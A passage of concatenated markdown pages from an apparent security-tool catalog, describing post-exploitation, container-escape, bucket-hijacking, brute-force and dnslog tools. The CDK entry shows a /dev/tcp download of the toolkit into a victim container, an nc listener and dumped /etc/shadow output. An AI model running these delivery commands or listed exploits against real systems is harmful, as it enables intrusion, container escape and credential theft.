- 修复打标页面描述错误与错位
- 修复android13兼容问题
- 修复打标文案错乱问题
- 修复app信息缺失导致的panic问题
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/As-Exploits.md
================================================
## As-Exploits <https://github.com/yzddmr6/As-Exploits>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
中国蚁剑后渗透框架
详细介绍:<http://yzddmr6.com/posts/as-exploits/>
支持类型:php/jsp/aspx
Payload部分很多借鉴了[冰蝎](https://github.com/rebeyond/Behinder)跟[哥斯拉](https://github.com/BeichenDream/Godzilla)的实现,向其开发者们表示感谢!
## 支持列表
| 模块名称\Shell类型 | PHP | ASPX | JSP |
| :---------------: | :--: | :--: | :--: |
| 基本信息 | √ | √ | √ |
| 反弹Shell | √ | √ | √ |
| 内存马 | | √ | √ |
| 内存马管理 | | √ | √ |
| 杀软识别 | √ | √ | √ |
| 提权辅助 | √ | √ | √ |
| 屏幕截图 | | √ | √ |
| ShellCode加载器 | | √ | √ |
| Jar加载器 | | | √ |
| Bypass OpenRASP | | | √ |
## 模块介绍
[As-Exploits Wiki](https://github.com/yzddmr6/As-Exploits/wiki#模块介绍)
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
- 2021-11-18 发布文章[《As-Exploits:中国蚁剑后渗透框架》](https://mp.weixin.qq.com/s/ofeoMTqaJgZcc37JQVYoeg)
## 最近更新
#### [v1.5.0] - 2023-10-21
**更新**
- 新增支持jspjs/aspxcsharp类型
- 除内存马/内存马管理模块以外,均支持Tomcat10
- 内存马注入模块更新:新增Filter部分类型,新增WebSocket部分类型,取消支持Servlet内存马
- 内存马管理模块新增Listener、Tomcat-Value、等等内存马的查杀检测
- Jar加载器模块内存加载功能BUG修复
- ShellCode加载-JNA模块更新,提高兼容性跟稳定性
- execPayload模块支持新增额外参数
- 新增Js引擎执行模块
- aspxcsharp类型支持回显自定义分隔符
- aspxcsharp新增SharpLoader模块
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/BinAbsInspector.md
================================================
## BinAbsInspector <https://github.com/KeenSecurityLab/BinAbsInspector>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
# What is BinAbsInspector?
BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, which is a long-term research project incubated at [Keenlab](https://keenlab.tencent.com/). It is based on abstract interpretation with the support from Ghidra. It works on Ghidra's Pcode instead of assembly. Currently it supports binaries on x86,x64, armv7 and aarch64.
# Installation
+ Install Ghidra according to [Ghidra's documentation](https://github.com/NationalSecurityAgency/ghidra#install)
+ Install [Z3](https://github.com/Z3Prover/z3) (tested version: 4.8.15)
+ Note that generally there are two parts for Z3 library: one is Java package, the other one is native library. The Java package is already included in "/lib" directory, but we suggest that you replace it with your own Java package for version compatibility.
+ For Windows, download a pre-built package from [here](https://github.com/Z3Prover/z3/releases), extract the zip file and add a PATH environment variable pointing to `z3-${version}-win/bin`
+ For Linux, install with package manager is NOT recommended, there are two options:
1. You can download suitable pre-build package from [here](https://github.com/Z3Prover/z3/releases), extract the zip file and copy `z3-${version}-win/bin/*.so` to `/usr/local/lib/`
2. or you can build and install z3 according to [Building Z3 using make and GCC/Clang](https://github.com/Z3Prover/z3#building-z3-using-make-and-gccclang)
+ For MacOS, it is similar to Linux.
+ Download the extension zip file from [release page](https://github.com/KeenSecurityLab/BinAbsInspector/releases)
+ Install the extension according to [Ghidra Extension Notes](https://ghidra-sre.org/InstallationGuide.html#GhidraExtensionNotes)
# Building
Build the extension by yourself, if you want to develop a new feature, please refer to [development guide](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Developer-Guide).
+ Install Ghidra and Z3
+ Install [Gradle 7.x](https://gradle.org/releases/) (tested version: 7.4)
+ Pull the repository
+ Run `gradle buildExtension` under repository root
+ The extension will be generated at `dist/${GhidraVersion}_${date}_BinAbsInspector.zip`
# Usage
You can run BinAbsInspector in headless mode, GUI mode, or with docker.
+ With Ghidra headless mode.
```
$GHIDRA_INSTALL_DIR/support/analyzeHeadless <projectPath> <projectName> -import <file> -postScript BinAbsInspector "@@<scriptParams>"
```
`<projectPath>` -- Ghidra project path.
`<projectName>` -- Ghidra project name.
`<scriptParams>` -- The argument for our analyzer, provides following options:
| Parameter | Description |
| ----------------------------------------- | --------------------------------------|
| `[-K <kElement>]` | KSet size limit [K](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details#kset) |
| `[-callStringK <callStringMaxLen>]` | Call string maximum length [K](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details#context)|
| `[-Z3Timeout <timeout>]` | Z3 timeout |
| `[-timeout <timeout>]` | Analysis timeout |
| `[-entry <address>]` | Entry address |
| `[-externalMap <file>]` | External function model config |
| `[-json]` | Output in json format |
| `[-disableZ3]` | Disable Z3 |
| `[-all]` | Enable all checkers |
| `[-debug]` | Enable debugging log output |
| `[-check "<cweNo1>[;<cweNo2>...]"]` | Enable specific checkers |
+ With Ghidra GUI
1. Run Ghidra and import the target binary into a project
2. Analyze the binary with default settings
3. When the analysis is done, open `Window -> Script Manager` and find `BinAbsInspector.java`
4. Double-click on `BinAbsInspector.java` entry, set the parameters in configuration window and click OK
5. When the analysis is done, you can see the CWE reports in console window, double-click the addresses from the report can jump to corresponding address
+ With Docker
```shell
git clone git@github.com:KeenSecurityLab/BinAbsInspector.git
cd BinAbsInspector
docker build . -t bai
docker run -v $(pwd):/data/workspace bai "@@<script parameters>" -import <file>
```
# Implemented Checkers
So far BinAbsInspector supports following checkers:
+ [CWE78](https://cwe.mitre.org/data/definitions/78.html) (OS Command Injection)
+ [CWE119](https://cwe.mitre.org/data/definitions/119.html) (Buffer Overflow (generic case))
+ [CWE125](https://cwe.mitre.org/data/definitions/125.html) (Buffer Overflow (Out-of-bounds Read))
+ [CWE134](https://cwe.mitre.org/data/definitions/134.html) (Use of Externally-Controlled Format string)
+ [CWE190](https://cwe.mitre.org/data/definitions/190.html) (Integer overflow or wraparound)
+ [CWE367](https://cwe.mitre.org/data/definitions/367.html) (Time-of-check Time-of-use (TOCTOU))
+ [CWE415](https://cwe.mitre.org/data/definitions/415.html) (Double free)
+ [CWE416](https://cwe.mitre.org/data/definitions/416.html) (Use After Free)
+ [CWE426](https://cwe.mitre.org/data/definitions/426.html) (Untrusted Search Path)
+ [CWE467](https://cwe.mitre.org/data/definitions/467.html) (Use of sizeof() on a pointer type)
+ [CWE476](https://cwe.mitre.org/data/definitions/476.htmll) (NULL Pointer Dereference)
+ [CWE676](https://cwe.mitre.org/data/definitions/676.html) (Use of Potentially Dangerous Function)
+ [CWE787](https://cwe.mitre.org/data/definitions/787.html) (Buffer Overflow (Out-of-bounds Write))
# Project Structure
The structure of this project is as follows, please refer to [technical details](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details) for more details.
```
├── main
│ ├── java
│ │ └── com
│ │ └── bai
│ │ ├── checkers checker implementatiom
│ │ ├── env
│ │ │ ├── funcs function modeling
│ │ │ │ ├── externalfuncs external function modeling
│ │ │ │ └── stdfuncs cpp std modeling
│ │ │ └── region memory modeling
│ │ ├── solver analyze core and grpah module
│ │ └── util utilities
│ └── resources
└── test
```
You can also build the javadoc with `gradle javadoc`, the API documentation will be generated in `./build/docs/javadoc`.
# Acknowledgement
We employ [Ghidra](https://ghidra-sre.org/) as our foundation and frequently leverage [JImmutable Collections](http://brianburton.github.io/java-immutable-collections/) for better performance.
Here we would like to thank them for their great help!
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
- 2022-06-22 发布文章[《BinAbsInspector:二进制文件自动化静态漏洞检测工具》](https://mp.weixin.qq.com/s/KBpkRvkq91mjkS_4QD3yjQ)
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/BurpCrypto.md
================================================
## BurpCrypto <https://github.com/whwlsfb/BurpCrypto>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite).
# Build
`$ mvn package`
# Usage
[中文使用说明](https://blog.wanghw.cn/burpcrypto)
- Download the precompiled jar package from [Releases](https://github.com/whwlsfb/BurpCrypto/releases).
- Add this jar package to your burpsuite's Extensions.
- Switch to BurpCrypto tab, select you need Cipher tab.
- Set key or some value.
- press "Add processor", and give a name for this processor.
- Switch to Intruder->Payloads->Payload Processing.
- press "Add", select "Invoke Burp extension", and select processor you just created.
- press "Start attack", have fun!
## Key Example
- Aes Key(UTF8String): abcdefgabcdefg12
- Aes IV(UTF8String): abcdefgabcdefg12
- Rsa X509 Key: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC0hrRIjb3noDWNtbDpANbjt5Iwu2NFeDwU16Ec87ToqeoIm2KI+cOs81JP9aTDk/jkAlU97mN8wZkEMDr5utAZtMVht7GLX33Wx9XjqxUsDfsGkqNL8dXJklWDu9Zh80Ui2Ug+340d5dZtKtd+nv09QZqGjdnSp9PTfFDBY133QIDAQAB
- Rsa Modulus: ca27d90f03753cbbc9958011baf701ac99305b63f68e26ab5617593e01d2fb519127fb87bafbe6e0472ec3a038575fa292adadbc79390a955a61b29431f78f4734773048a45dcf100e23cabf2df11a55aa90cd6b024a44eed1096c3b9e1408d46aae54d7291b82fe4b7867c5eaa45e9cc0ba7f7ae3e5593337c7dcbace2d02ed2fbbff26c6df8a32bb26be80603fcd94c6c8dbd67878d77b37fedcf808e3d8f469aaa7c65d033d547a5c8ea9bdd5c89b836c65852f355a5efd9c7137a186a62b5eb0e052c8be3096d3b51133f8a8c108292a296c99d37bad42bcc3f6c39fa5e583582942b4fc4e7ff4b6779fff5bbaddc65b19c7c57d8cdb39b1a994e08d4a2f50793d8f707d069c380baf0f64bfdce3b35d0b5c5c59348a35a082012aaf4991080abf518b55787969ff24186cb95f7e7218c904cf1dcaeb5bed723e305b83f2e85d6f116d2c7400f9e49d904db8a5a3a0701cdb579fbf3128511acd0f789ece1233ed926d705b3b0dfa34bf33f5ae4bdc611a602aa03aaae13400bc7ad3813ea4474dc62de3d0cb1f5aac277d895a75d38f9b920938fa6b1de35bd6132798c122403c685bdb6e5e24bbd70cfb3e968da0b8affd398e539e7c1e7add09891780bcbd278f3900499ae09cee0dc62e3f92e70001bab6d46261d2801a37f80d84d0e39fce6eaedf106a61b5961960641b9db0e4e23c770e6370ac5d61c6c9eb0f07
- Rsa Exponent: 010001
- DES Key: 12345678
- DESede Key: 123456781234567812345678
## Screenshots
AES Example:

ExecJs Example (Here is the modified MD5 algorithm):

Quick Crypto:

<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
- 2021-11-25 发布文章[《BurpCrypto : 万能网站密码爆破测试工具》](https://mp.weixin.qq.com/s/-paMF8IepVUue7HyVHiLmw)
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/CDK.md
================================================
## CDK <https://github.com/cdk-team/CDK>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
# CDK - Zero Dependency Container Penetration Toolkit
English | [简体中文](https://github.com/cdk-team/CDK/wiki/CDK-Home-CN)

## Legal Disclaimer
Usage of CDK for attacking targets without prior mutual consent is illegal.
CDK is for security testing purposes only.
## Overview
CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.
## Quick Start
Run **`cdk eva`** to get evaluate info and a recommend exploit, then run **`cdk run`** to start the attack.
```
> ./cdk eva --full
[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.
> ./cdk run cap-dac-read-search
Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
```
## Installation/Delivery
Download latest release in https://github.com/cdk-team/CDK/releases/
Drop executable files into the target container and start testing.
### TIPS: Deliver CDK into target container in real-world penetration testing
If you have an exploit that can upload a file, then you can upload CDK binary directly.
If you have a RCE exploit, but the target container has no `curl` or `wget`, you can use the following method to deliver CDK:
1. First, host CDK binary on your host with public IP.
```
(on your host)
nc -lvp 999 < cdk
```
2. Inside the victim container execute
```
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk
```
## Usage
```
Usage:
cdk evaluate [--full]
cdk run (--list | <exploit> [<args>...])
cdk <tool> [<args>...]
Evaluate:
cdk evaluate Gather information to find weakness inside container.
cdk evaluate --full Enable file scan during information gathering.
Exploit:
cdk run --list List all available exploits.
cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki
Auto Escape:
cdk auto-escape <cmd> Escape container in different ways then let target execute <cmd>.
Tool:
vi <file> Edit files in container like "vi" command.
ps Show process information like "ps -ef" command.
nc [options] Create TCP tunnel.
ifconfig Show network information.
kcurl <path> (get|post) <uri> <data> Make request to K8s api-server.
ectl <endpoint> get <key> Unauthorized enumeration of ectd keys.
ucurl (get|post) <socket> <uri> <data> Make request to docker unix socket.
probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000
Options:
-h --help Show this help msg.
-v --version Show version.
```
## Features
CDK has three modules:
1. Evaluate: gather information inside container to find potential weakness.
2. Exploit: for container escaping, persistance and lateral movement
3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.
### Evaluate Module
Usage
```
cdk evaluate [--full]
```
This command will run the scripts below without local file scanning, using `--full` to enable all.
|Tactics|Script|Supported|Usage/Example|
|---|---|---|---|
|Information Gathering|OS Basic Info|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-System-Info)|
|Information Gathering|Available Capabilities|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities)|
|Information Gathering|Available Linux Commands|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities)|
|Information Gathering|Mounts|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Mounts)|
|Information Gathering|Net Namespace|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Net-Namespace)|
|Information Gathering|Sensitive ENV|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Services)|
|Information Gathering|Sensitive Process|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Services)|
|Information Gathering|Sensitive Local Files|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Sensitive-Files)|
|Information Gathering|Kube-proxy Route Localnet(CVE-2020-8558)|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-check-net.ipv4.conf.all.route_localnet)|
|Information Gathering|DNS-Based Service Discovery|✔|[link](https://github.com/kubernetes/dns/blob/master/docs/specification.md)|
|Discovery|K8s Api-server Info|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server)|
|Discovery|K8s Service-account Info|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-Service-Account)|
|Discovery|Cloud Provider Metadata API|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Cloud-Provider-Metadata-API)|
### Exploit Module
List all available exploits:
```
cdk run --list
```
Run targeted exploit:
```
cdk run <script-name> [options]
```
| Tactic | Technique | CDK Exploit Name | Supported | In Thin | Doc |
|----------------------|------------------------------------------------------------|------------------------|-----------|----------------------------------------------------------------------------|--------------------------------------------------------------------------------------|
| Escaping | docker-runc CVE-2019-5736 | runc-pwn | ✔ | ✔ ||
| Escaping | containerd-shim CVE-2020-15257 | shim-pwn | ✔ || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-shim-pwn) |
| Escaping | docker.sock PoC (DIND attack) | docker-sock-check | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-check) |
| Escaping | docker.sock RCE | docker-sock-pwn | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-pwn) |
| Escaping | Docker API(2375) RCE | docker-api-pwn | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-api-pwn) |
| Escaping | Device Mount Escaping | mount-disk | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-disk) |
| Escaping | LXCFS Escaping | lxcfs-rw | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-lxcfs-rw) |
| Escaping | Cgroups Escaping | mount-cgroup | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup) |
| Escaping | Abuse Unprivileged User Namespace Escaping CVE-2022-0492 | abuse-unpriv-userns | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-abuse-unpriv-userns) |
| Escaping | Procfs Escaping | mount-procfs | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs) |
| Escaping | Ptrace Escaping PoC | check-ptrace | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-ptrace) |
| Escaping | Rewrite Cgroup(devices.allow) | rewrite-cgroup-devices | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-rewrite-cgroup-devices) |
| Escaping | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-cap-dac-read-search) |
| Discovery | K8s Component Probe | service-probe | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-service-probe) |
| Discovery | Dump Istio Sidecar Meta | istio-check | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-istio) |
| Discovery | Dump K8s Pod Security Policies | k8s-psp-dump | ✔ || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-psp-dump) |
| Remote Control | Reverse Shell | reverse-shell | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-reverse-shell) |
| Remote Control | Kubelet Exec | kubelet-exec | ✔ | ✔ | |
| Credential Access | Registry BruteForce | registry-brute | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-Container-Image-Registry-Brute) |
| Credential Access | Access Key Scanning | ak-leakage | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-ak-leakage) |
| Credential Access | Etcd Get K8s Token | etcd-get-k8s-token | ✔ | ✔ | |
| Credential Access | Dump K8s Secrets | k8s-secret-dump | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-secret-dump) |
| Credential Access | Dump K8s Config | k8s-configmap-dump | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-configmap-dump) |
| Privilege Escalation | K8s RBAC Bypass | k8s-get-sa-token | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-get-sa-token) |
| Persistence | Deploy WebShell | webshell-deploy | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-webshell-deploy) |
| Persistence | Deploy Backdoor Pod | k8s-backdoor-daemonset | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-backdoor-daemonset) |
| Persistence | Deploy Shadow K8s api-server | k8s-shadow-apiserver | ✔ || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-shadow-apiserver) |
| Persistence | K8s MITM Attack (CVE-2020-8554) | k8s-mitm-clusterip | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Evaluate:-k8s-mitm-clusterip) |
| Persistence | Deploy K8s CronJob | k8s-cronjob | ✔ | ✔ | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-cronjob) |
**Note about Thin:** The **thin release** is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.
### Tool Module
Running commands like in Linux, little different in input-args, see the usage link.
```
cdk nc [options]
cdk ps
```
|Command|Description|Supported|Usage/Example|
|---|---|---|---|
|nc|TCP Tunnel|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-nc)|
|ps|Process Information|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ps)|
|ifconfig|Network Information|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ifconfig)|
|vi|Edit Files|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-vi)|
|ectl|Unauthorized enumeration of ectd keys|✔||
|kcurl|Request to K8s api-server|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-kcurl)|
|dcurl|Request to Docker HTTP API|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-dcurl)|
|ucurl|Request to Docker Unix Socket|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ucurl)|
|rcurl|Request to Docker Registry API|||
|probe|IP/Port Scanning|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-probe)|
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
- 2022-11-11 发布演示视频[404星链计划开源安全工具演示——CDK](https://www.bilibili.com/video/BV1DG4y1Z784/)
- 2021-11-11 发布文章[《CDK:一款针对容器场景的多功能渗透工具》](https://mp.weixin.qq.com/s/fopvHFPAbbqtCE6SV9JerQ)
## 最近更新
#### [v1.5.6] - 2026-02-23
**更新**
- 添加cgroup2_ebpf_bypass容器逃逸漏洞
- 添加容器安全隔离检查以评估模块
- 修复(eva):重命名服务发现文件
#### [v1.5.5] - 2025-02-23
**更新**
- 修复新的调试日志,未来需要修复该错误
- 修复 gh action 中路径中未找到 gox 的问题
- 修复 gh action 由于使用了弃用版本而自动失败的问题
- 修复 shim-pwn 合并目录在路径中出现两次的问题
#### [v1.5.4] - 2024-11-15
**更新**
- 修复合并目录在路径中出现两次的问题
- 修复添加测试 poc,Github Action 中出现未知错误的问题
- 优化漏洞列表的输出
- 在所有漏洞中添加类型字符串
- 修复 github action 检查因未知问题而失败的问题
- 添加漏洞的基本结构
- 重新组织漏洞包中的 exp 文件
- 在 cmd 行中运行二进制本机 kubectl 的保留路径
- 修复在路径中找不到 gox 的问题
- 修复使用了弃用版本而自动失败的问题
#### [v1.5.3] - 2024-05-19
**更新**
- 为 docker rootfs 适配 docker devicemapper 文件系统
- 增加查看网络连接信息
- 修复 k8s apiserver 中超时问题
- 添加netstat文档
- 修复 cgroup 后半部分切片长度错误
#### [v1.5.2] - 2023-03-12
**更新**
- 支持 linux 环境下的不同容器运行时,如 containerd、runc、docker
- 修复shadow-apiserver匿名访问无效的issue,支持新版本的k8s,如 v1.23.1
- 添加迭代部分功能的消息提醒
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/Cloud-Bucket-Leak-Detection-Tools.md
================================================
## Cloud-Bucket-Leak-Detection-Tools <https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
```bash
git clone https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git
cd Cloud-Bucket-Leak-Detection-Tools/
# 安装依赖 建议使用Python3.8以上的版本 我的版本: Python 3.9.13 (main, May 24 2022, 21:28:31)
# 已经测试版本如下
# 1、python3.8.9
# 2、python3.9.13
# 3、python3.7
# 4、python3.6.15
# 5、python3.9.6
pip3 install -r requirements.txt
python3 main.py -h
```

使用之前需要在`config/conf.py`文件配置自己对应的云厂商AK

## 1、阿里云存储桶
### 1.1、单个存储桶检测
```bash
python3 main.py -aliyun [存储桶URL]
```

### 1.2、自动存储桶劫持
当如果检测存储桶不存在时会自动劫持该存储桶

### 1.3、批量存储桶地址检测
```bash
# fofa语法
domain="aliyuncs.com"
server="AliyunOSS"domain="aliyuncs.com"
```
```bash
# 使用-faliyun
python3 main.py -faliyun url.txt
```

## 2、腾讯云存储桶
```bash
python3 main.py -tcloud [存储桶地址]
```

## 3、华为云存储桶
```bash
python3 main.py -hcloud [存储桶地址]
```

## 4、AWS存储桶
```bash
python3 main.py -aws [存储桶地址]
```

## 5、扫描结果保存
扫描结果会存放在`results`目录下


<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/CodeReviewTools.md
================================================
## CodeReviewTools <https://github.com/Ppsoft1991/CodeReviewTools>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
HW竞争越来越激烈的年代,谁能在指定时间内打下更多的点,谁就能在内网中抢下先机。
在HW项目中,在有源码的情况下为了快速冲下一个站,势必需要提升自己看代码的速度,寻找最薄弱的环节。
在做项目的时候发现几个问题,第一个就是拿到目标网站的war包载入idea,发现缺少某些class
第二个就是某些class被分包编译在不同的jar包里面
我们想快速搜索代码中的关键点,就必须得对jar包进行反编译。所以我写了CodeReviewTools
## 🍭 目前功能
- 通过正则搜索特定class名称
- 通过正则直接反编译拥有特定groupId的jar包到某个目录
```
CodeReviewTools v1.0 by Ppsoft1991
usage: java -jar CodeReviewTools.jar -m <method>
-d,--dir <arg> target path
-f,--file <arg> target file
-h,--help print help information
-m,--method <arg> [search, unzip, decompiler, clear, all, war]
-n,--name <arg> search class file or group name
-o,--output <arg> output path
```
工具release版本使用jdk 11.0.9编译,如需要1.8版本请自行下载源码编译使用
## 💡 例子
- 获得war包,一键反编译classes
```java -jar CodeReviewTools.jar -m war -f webapps.war```

会在-f制定的war包目录下生成对应的zip文件
- 想快速寻找哪些jar包存在名为*Controller的jar文件
```java -jar CodeReviewTools.jar -m search -n "nc(.)*Controller\$" -d "home/"```

- 想快速解压jar包中包含groupId为com.yxxxx的jar并且反编译存储在/tmp/nc
```java -jar CodeReviewTools.jar -m all -n "com.yxxx(.)*" -d "home/lib" -o "/tmp/nc" ```

效果:

<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/Cola-Dnslog.md
================================================
## Cola-Dnslog <https://github.com/AbelChe/cola_dnslog>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平台),
- 完全开源
- 支持dns http ldap rmi等协议
- 提供API调用方式便于与其他工具结合
- 支持钉钉机器人、Bark等提醒
- 支持docker一键部署
------
涉及到技术、框架:
`dns` `http` `ldap` `rmi` `webui` `vue-element-admin` `fastapi` `sqlite`
可帮助检测漏洞:
`log4j2` `fastjson` `ruoyi` `Spring` `RCE` `Blind SQL` `Bland XXE`
特色:
`Dingtalk Robot` `Bark` `API` `ldaplog` `rmilog` `Docker`
## 🥯 使用方法
> 假设你购买的域名为`example.com`
>
> 你的vps ip为`1.1.1.1`
### 域名
请自行购买域名,并将域名的解析服务器托管至部署cola_dnslog的服务器
以godaddy为例
1. 配置域名解析处右上角三个点,点击Host Names

2. 修改或新增主机名如下图所示,ip地址填写你的vps地址即可

3. 回到dns管理,将域名服务器修改为`ns1.example.com`和`ns2.example.com`

### 安装部署
> 因为一些国内网络众所周知的原因,大多数同学使用国内VPS都会卡在前端npm构建的时候,目前暂未找到更好的解决方案,建议使用国外或者网络畅通的VPS搭建。
>
> 欢迎大家提issues!
#### Docker(推荐)
##### 一键启动(推荐)
1. 下载源码
```sh
git clone https://github.com/Abelche/cola_dnslog.git
cd cola_dnslog
```
2. 修改docker-compose.yml中environment变量
```yml
...
server:
...
environment:
DNS_DOMAIN: example.com # 自己的域名
NS1_DOMAIN: ns1.example.com # ns1绑定
NS2_DOMAIN: ns2.example.com # ns2绑定
SERVER_IP: 1.1.1.1 # vps ip
HTTP_PORT: 80 # httplog服务端口
HTTP_RESPONSE_SERVER_VERSION: nginx # httplog返回头的服务端信息Server: nginx
LDAP_PORT: 1389 # ldaplog服务端口
RMI_PORT: 1099 # rmilog服务端口
...
front:
...
environment:
API_BASE_URL: 'http://1.1.1.1:28001' # http://vpsip:28001 / http://example.com:28001
...
```
3. 启动
```sh
docker-compose up -d
```
4. 启动之后查看docker日志或者查看info.txt获取账号信息
> server端程序运行会在程序根目录创建一个info.txt用于记录初始化的账号信息
```sh
docker-compose logs
